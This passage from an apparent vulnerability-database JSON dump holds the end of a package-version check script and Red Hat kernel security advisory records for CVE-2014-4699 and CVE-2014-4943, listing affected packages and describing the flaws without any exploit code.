= isdpkgvuln(pkg:\"linux-image-3.2.0-67-powerpc64-smp\", ver:\"3.2.0-67.101\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-67-virtual\", ver:\"3.2.0-67.101\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-04-15T16:21:12", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-tools-debuginfo", "packageFilename": "kernel-tools-debuginfo-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debuginfo-common-x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel", "packageFilename": "kernel-3.10.0-123.4.4.el7.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-doc", "packageFilename": "kernel-doc-3.10.0-123.4.4.el7.noarch.rpm", "arch": "noarch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-3.10.0-123.4.4.el7.noarch.rpm", "arch": "noarch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "perf", "packageFilename": "perf-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel", "packageFilename": "kernel-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-123.4.4.el7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-tools-debuginfo", "packageFilename": "kernel-tools-debuginfo-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debuginfo-common-ppc64", "packageFilename": "kernel-debuginfo-common-ppc64-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel", "packageFilename": "kernel-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "perf", "packageFilename": "perf-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-bootwrapper", "packageFilename": "kernel-bootwrapper-3.10.0-123.4.4.el7.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-kdump-debuginfo", "packageFilename": "kernel-kdump-debuginfo-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debuginfo-common-s390x", "packageFilename": "kernel-debuginfo-common-s390x-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "perf", "packageFilename": "perf-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel", "packageFilename": "kernel-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-kdump-devel", "packageFilename": "kernel-kdump-devel-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-123.4.4.el7", "packageName": "kernel-kdump", "packageFilename": "kernel-kdump-3.10.0-123.4.4.el7.s390x.rpm", "arch": "s390x", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced\nprocess' instruction pointer to be set to a non-canonical memory address\nwithout forcing the non-sysret code path when returning to user space.\nA local, unprivileged user could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-4699,\nImportant)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699,\nand Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "reporter": "RedHat", "published": "2014-07-23T04:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "(RHSA-2014:0923) Important: kernel security update", "type": "redhat", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-12T03:33:24", "id": "RHSA-2014:0923", "href": "https://access.redhat.com/errata/RHSA-2014:0923", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-06T18:05:14", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-debuginfo-common-i686", "packageFilename": "kernel-debuginfo-common-i686-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-431.20.5.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-debuginfo-common-x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "perf", "packageFilename": "perf-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-2.6.32-431.20.5.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-431.20.5.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-431.20.5.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-431.20.5.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-431.20.5.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "kernel-debuginfo-common-ppc64", "packageFilename": "kernel-debuginfo-common-ppc64-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "kernel-bootwrapper", "packageFilename": "kernel-bootwrapper-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "perf", "packageFilename": "perf-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "ppc64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-431.20.5.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel-kdump-debuginfo", "packageFilename": "kernel-kdump-debuginfo-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel-debuginfo-common-s390x", "packageFilename": "kernel-debuginfo-common-s390x-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel-kdump", "packageFilename": "kernel-kdump-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "perf", "packageFilename": "perf-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel-kdump-devel", "packageFilename": "kernel-kdump-devel-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-431.20.5.el6", "arch": "s390x", "packageName": "kernel", "packageFilename": "kernel-2.6.32-431.20.5.el6.s390x.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's ptrace subsystem allowed a traced\nprocess' instruction pointer to be set to a non-canonical memory address\nwithout forcing the non-sysret code path when returning to user space.\nA local, unprivileged user could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-4699,\nImportant)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Andy Lutomirski for reporting CVE-2014-4699,\nand Sasha Levin for reporting CVE-2014-4943.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "reporter": "RedHat", "published": "2014-07-23T04:00:00", "type": "redhat", "title": "(RHSA-2014:0924) Important: kernel security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-4699", "CVE-2014-4943"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:14", "id": "RHSA-2014:0924", "href": "https://access.redhat.com/errata/RHSA-2014:0924", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:18:00", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "enchantments_done": [], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "ppc64", "packageFilename": "kernel-2.6.32-358.46.2.el6.ppc64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.46.2.el6", "arch": "s390x", "packageFilename": "kernel-debug-debuginfo-2.6.32-358.46.2.el6.s390x.rpm", "packageName": "kernel-debug-debuginfo", "operator": 